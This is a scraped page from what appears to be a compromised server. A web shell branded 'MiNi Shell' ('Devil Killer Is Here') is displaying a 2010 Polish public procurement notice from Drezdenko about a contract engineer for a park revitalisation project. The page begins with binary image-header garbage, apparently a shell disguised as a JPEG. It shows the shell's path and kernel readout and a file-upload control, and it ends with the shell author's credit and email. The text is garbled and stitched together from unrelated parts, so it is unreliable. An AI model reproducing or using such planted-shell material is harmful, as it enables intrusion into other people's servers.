JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100622/161907-N-2010.html

<p class="kh_header"><b>Drezdenko: Inżynier Kontraktu dla zadania: Utworzenie Parku Kultur Świata ( Park of World Culture ) poprzez rewitalizację zabytkowego założenia parkowego w Drezdenku - I ETAP</b><br>
<b>Numer ogłoszenia: 161907 - 2010; data zamieszczenia: 22.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Warszawska 1, 66-530 Drezdenko, woj. lubuskie, tel. 095 7638027; 7620202, faks 095 7620220.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Inżynier Kontraktu dla zadania: Utworzenie Parku Kultur Świata ( Park of World Culture ) poprzez rewitalizację zabytkowego założenia parkowego w Drezdenku - I ETAP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie  Usług Inżyniera Kontraktu, który równocześnie pełni funkcję  Inspektora Nadzoru Inwestorskiego, kompleksowo koordynującego i odpowiadającego przed zamawiającym za pozostałych Inspektorów wielobranżowego Nadzoru Inwestorskiego dla zadania Utworzenie Parku Kultur Świata  ( Park of World Culture ) poprzez rewitalizację zabytkowego założenia parkowego w Drezdenku - I ETAP realizowanego w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013, Priorytet IV Rozwój i modernizacja infrastruktury społecznej, działanie 4.3 Rewitalizacja zdegradowanych obszarów miejskich i wiejskich. Inżynier Kontraktu nadzoruje, monitoruje i składa raporty w trakcie i po zrealizowaniu rzeczowym projektu; rozlicza projekt; bierze udział w czynnościach odbioru: częściowego, końcowego, pogwarancyjnego; pośredniczy w kontaktach pomiędzy zamawiającym a wykonawcą dokumentacji projektowej i wykonawcą robót odpowiadając za ich prawidłową realizację; Inżynier Kontraktu działa zgodnie z postanowieniami decyzji o pozwoleniu na budowę, obowiązkami wynikającymi z przepisów prawa, w szczególności Prawa budowlanego tj. z ustawy z dnia 07.07.1994r. - Prawo Budowlane (tekst jednolity - Dz. U. z 2006r. Nr 156 poz. 1118 z późn. zm.), oraz wiedzą techniczną, a także wytycznymi Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013. Inne obowiązki ogólne Inżyniera Kontaktu Inspektora Nadzoru Inwestorskiego, który zobowiązany jest do:
1.	 Przestrzegania przepisów obowiązującego prawa.
2.	 Posiadania przez cały okres trwania niniejszej umowy ważnej polisy ubezpieczeniowej z tytułu odpowiedzialności cywilnej prowadzonej  działalności. W razie zbliżania się terminu upływu ważności tej polisy, na 7 dni przed upływem tego terminu, Wykonawca dostarczy Zamawiającemu aktualną polisę. Na każde wezwanie Zamawiającego Inżynier Kontraktu zobowiązany jest przedłożyć dowody dotrzymywania warunków umowy ubezpieczenia, w tym dowody opłacenia składek. Brak ciągłości umowy ubezpieczenia, w tym nie zapłacenie należytych składek, może stanowić podstawę do wypowiedzenia umowy bez zachowania okresu wypowiedzenia z przyczyn leżących po stronie Inżyniera Kontraktu.
3.	Wykonywania usługi z należytą starannością i skutecznością, kierując się interesem ekonomicznym Zamawiającego i obowiązującymi przepisami w oparciu, o które wykonawca realizuje przedmiotową usługę oraz zgodnie z przyjętymi zasadami wiedzy technicznej i inżynierskiej, ekonomicznej, prawniczej i innej. We wszystkich sprawach  Inżynier Kontraktu zawsze będzie popierał i chronił interesy Zamawiającego w kontaktach ze Stronami trzecimi.
4.	Informowania na bieżąco (w tym samym dniu lub z dnia na dzień) Zamawiającego o postępie i zaangażowaniu finansowym robót budowlanych , ponadto w terminie do 7 dni, na każde pisemne żądanie zamawiającego. 
5.	Na każde żądanie Zamawiającego, Inżynier Kontraktu zobowiązany jest udostępnić lub wydać wszelkie dokumenty związane z wykonywaniem przedmiotowej umowy. W tym celu Inżynier Kontraktu zezwoli osobie upoważnionej przez Zamawiającego, skontrolować lub zbadać gromadzoną dokumentację dotyczącą wykonywania umowy oraz sporządzić z niej kopie zarówno podczas, jak i po wykonaniu usług.
6.	W związku z zawarciem niniejszej umowy, Zamawiający posiada prawo do dokonywania w każdym czasie kontroli przestrzegania zakresu, zasad oraz harmonogramu realizacji umowy przez Inżyniera Kontraktu. W wypadku wykrycia uchybienia kwalifikującego się do nałożenia na Inżyniera Kontraktu jednej z kar umownych, Zamawiający wystawi pisemny protokół uchybień, określając w nim miejsce, czas i rodzaj uchybienia.
7.	Natychmiastowego informowania inwestora o niezgodności realizacji zadania z harmonogramem robót.

Obowiązki szczegółowe Inżyniera Kontaktu/Inspektora Nadzoru Inwestorskiego:
a)	wykonywanie obowiązków Inspektora nadzoru inwestorskiego i koordynatora czynności inspektorów nadzoru inwestorskiego. Ustanowienie inspektorów nadzoru we wszystkich branżach występujących w zadaniu zgodnie z przepisami Prawa budowlanego,
b)	przekazanie protokolarnie Wykonawcy inwestycji terenu budowy, przy udziale Zamawiającego,
c)	 wyegzekwowanie od Wykonawcy Inwestycji jego obowiązków wynikających z umowy zawartej z Zamawiającym i kontrola ich przestrzegania,
d)	 cykliczna obecność na terenie budowy przez okres realizacji inwestycji, nie rzadziej niż 2 razy w tygodniu w tym raz na wezwanie Zamawiającego.
e)	  kontrolowanie w sposób ciągły jakości robót oraz wbudowywanych materiałów zgodnie z wymogami specyfikacji technicznej, dokumentacji projektowej, bieżące archiwizowanie wszelkich atestów, deklaracji, certyfikatów itp.,
f)	 stałe monitorowanie i kontrola postępu robót poprzez sprawdzanie ich rzeczywistego zaawansowania i zgodności realizacji z obowiązującym harmonogramem robót, wydawanie poleceń kierownikowi budowy przyspieszenia lub opóźnienia prac,
g)	 informowanie Zamawiającego, z odpowiednim wyprzedzeniem, o wszelkich zagrożeniach występujących podczas realizacji robót, które mogą mieć wpływ na wydłużenie czasu wykonania lub zwiększenie kosztów, brak informacji spowoduje pociągnięcie Inżyniera Kontraktu do odpowiedzialności, 
h)	 koordynacja i kontrola wykonania robót,
i)	 bieżąca kontrola zgodności wykonania robót z zatwierdzoną dokumentacją projektową w zakresie wszystkich branż, pozwoleniami, przepisami prawa, polskimi normami oraz zasadami wiedzy technicznej,
j)	 wydawanie Kierownikowi budowy/robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących usunięcia nieprawidłowości lub zagrożeń, przyspieszenie lub opóźnienia prac, wykonania prób lub badań, a także odkrywek oraz poświadczenie usunięcia wad,
k)	 żądanie wstrzymania robót budowlanych w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie, bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę,
l)	 obsługa dokumentacyjna budowy, prowadzenie dokumentacji fotograficznej cyfrowej budowy, poszczególnych jej etapów, w tym wszystkich odbiorów budowlanych, z pisemnym komentarzem dla Zamawiającego,
m)	 monitorowanie listy dostaw, sprawdzenie zgodności ze specyfikacją,
n)	 ustalanie zakresu ewentualnych robót zamiennych, ich kosztorysowanie i wykazanie różnic, opracowywanie protokołów konieczności wykonywania tych robót z odpowiednim uzasadnieniem, w celu  uzyskania akceptacji ze strony Zamawiającego,
o)	 przeprowadzanie odbiorów robót zanikających (ulegających zakryciu) i odbiorów częściowych (etapowych), uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów, zgodnie z harmonogramem rzeczowo-finansowym realizacji zadania,
p)	 organizowanie i prowadzenie regularnych spotkań koordynacyjnych (nie rzadziej niż jeden raz w miesiącu) z Wykonawcą Inwestycji, podwykonawcami, projektantami i innymi uczestnikami realizacji inwestycji, przy współudziale przedstawiciela Zamawiającego w celu omówienia i ustalenia procedur organizacyjnych, omówienia postępu robót i  ich jakości, zaangażowanego potencjału siły roboczej i problematyki BHP, zgodności wykonywania robót z przepisami prawa, orzeczeń i uzgodnień właściwych organów,
q)	 organizowanie przeglądów gwarancyjnych oraz nadzór nad usuwaniem wad i usterek w okresie rękojmi i/lub gwarancji,
r)	 organizowanie i dokonywanie odbiorów częściowych i końcowych wykonanych robót przy udziale przedstawiciela Zamawiającego, przygotowanie dokumentacji odbiorczej oraz list wad i usterek z terminem ich usunięcia, w tym: potwierdzenie w dzienniku budowy gotowości obiektu do odbioru końcowego, skompletowanie dokumentacji powykonawczej oraz dokumentacji fotograficznej (cyfrowej), skompletowanie dokumentów odbiorów przez dysponentów sieci, skompletowanie dokumentów zamontowanego wyposażenia i urządzeń (karty gwarancyjne, instrukcje itp.), wystąpienie do Zamawiającego z wnioskiem o powołanie komisji odbioru końcowego, następnie powiadomienie o odbiorze wszystkich uczestników procesu inwestycyjnego i przeprowadzenie procesu odbioru końcowego wraz ze sporządzeniem protokołu,
s)	 przygotowanie dokumentacji budowy w celu wystąpienia przez Zamawiającego o wydanie decyzji o pozwoleniu na użytkowanie obiektu,
t)	 wyegzekwowanie od wykonawcy robót dokumentacji budowy i dokumentacji powykonawczej i przekazanie jej (uporządkowanej i kompletnej) Zamawiającemu,
u)	 pomoc merytoryczna Zamawiającemu bez dodatkowego wynagrodzenia w przypadku sporów prawnych uczestników procesu inwestycyjnego,

Kontrola kosztów inwestycji i rozliczenie inwestycji:
a)	analiza harmonogramów płatności Wykonawców robót i przedkładanie jej wyników przedstawicielowi zamawiającego,
b)	analiza, wraz z potwierdzeniem zasadności, wniosków płatności dla Wykonawcy inwestycji, sprawdzanie dokumentów rozliczeniowych pod względem merytorycznym i rachunkowym,
c)	 sprawdzanie prawidłowości wystawianych faktur częściowych pod kątem wystąpienia przesłanek do ich wystawienia, zakresu robót i kwoty do zapłaty (pod względem merytorycznym, formalnym rachunkowym), na zasadach określonych w umowie z Wykonawcą Inwestycji, bez prawa ich odbioru, kwalifikowanie ich do zapłaty i przedstawianie Zamawiającemu do zapłaty, zgodnie z zasadami Lubuskiego Regionalnego Programu Operacyjnego, w terminach umożliwiających złożenie wniosku/ów o płatność.
d)	naliczanie kar umownych wobec wykonawcy robót oraz określenie wysokości szkody i ewentualnie odszkodowania, w przypadkach gdy wysokość szkody przewyższa wysokość określonych przez strony kar umownych, a ponadto przekazywanie tych danych Zamawiającemu w celu ich egzekwowania,
e)	ustalenie podstaw i wysokości odszkodowania należnego Zamawiającemu, w przypadku nienależytego bądź wadliwego wykonania robót,
f)	 przygotowywanie rozliczeń końcowych i dokonanie ich  najpóźniej w ciągu 7 dni od dnia uzyskania pozwolenia na użytkowanie w uzgodnieniu z Wykonawcą Inwestycji, przy udziale przedstawiciela Zamawiającego, przygotowanie druków PT i OT.

Nadzór inwestorski nad realizacją Projektu w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013 oraz przygotowanie elementów dokumentacji obowiązującej w procedurze dofinansowania Projektu w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013 z funduszy strukturalnych Unii Europejskiej oraz zgodnych z wytycznymi krajowymi i prawem wspólnotowym (Zamawiający zwany jest tutaj Beneficjentem):
a)	systematyczne monitorowanie przebiegu realizacji Projektu oraz informowanie Beneficjenta, z wyprzedzeniem, o koniecznych zmianach w projekcie,
b)	systematyczny monitoring i kontrola realizacji Projektu w zakresie zgodności z wnioskiem o dofinansowanie, harmonogramem rzeczowo-finansowym, listą wydatków kwalifikowanych oraz stopniem realizacji wskaźników oraz niezwłoczne informowanie Beneficjenta o ewentualnie zaistniałych niezgodnościach i konieczności podjęcia działań korygujących,
c)	 wszelkie tworzone dokumenty Inżyniera Kontraktu przekazuje Beneficjentowi w wersji elektronicznej oraz w wersji papierowej w ilości 2 egzemplarzy,
d)	 wszelka wytworzona przez Inżyniera Kontraktu dokumentacja w czasie realizacji Projektu będzie znajdowała się na stałe w siedzibie Beneficjenta, w miejscu przez niego wyznaczonym,
e)	wykonywanie wszystkich innych czynności nie wymienionych powyżej niezbędnych do prawidłowej realizacji Projektu i do należytego zabezpieczenia interesu Zamawiającego Inżynier Kontraktu we własnym zakresie zapewni sprzęt i materiały niezbędne do realizacji zamówienia.
f)	 uczestniczenie w kontrolach przeprowadzanych przez Instytucję Zarządzającą lub inną uprawnioną do tego instytucję na miejscu realizacji Projektu w celu zbadania zgodności z wnioskiem o dofinansowanie Projektu zgodnie z zasadami Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013.

Inżynier kontraktu zapewnia pełnienie funkcji Inspektorów Nadzoru we wszystkich branżach potrzebnych do realizacji zadania, ze wskazaniem Inspektora Głównego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienie uzupełniające do 50% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.54.10.00-2, 71.00.00.00-8, 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia, metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,oświadczenie, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,oświadczenie, o spełnieniu warunków udziału w postępowaniu zgodnie z  art. 22 ust. 1 oraz o niepodleganiu wykluczeniu zgodnie z art. 24 ustawy Prawo Zamówień Publicznych,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin wykonania umowy może ulec odpowiedniemu przesunięciu po uprzednim uzgodnieniu z Zamawiającym w przypadku zmian w harmonogramie realizacji inwestycji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.drezdenko.pl (zakładka pobierz SIWZ)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Warszawska 1
66-530 Drezdenko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2010 godzina 09:00, miejsce: Urząd Miejski w  Drezdenku ul. Warszawska 1   66-530 Drezdenko
w pokoju nr 120 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013, Priorytet IV Rozwój i modernizacja infrastruktury społecznej, działanie 4.3 Rewitalizacja zdegradowanych obszarów miejskich i wiejskich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com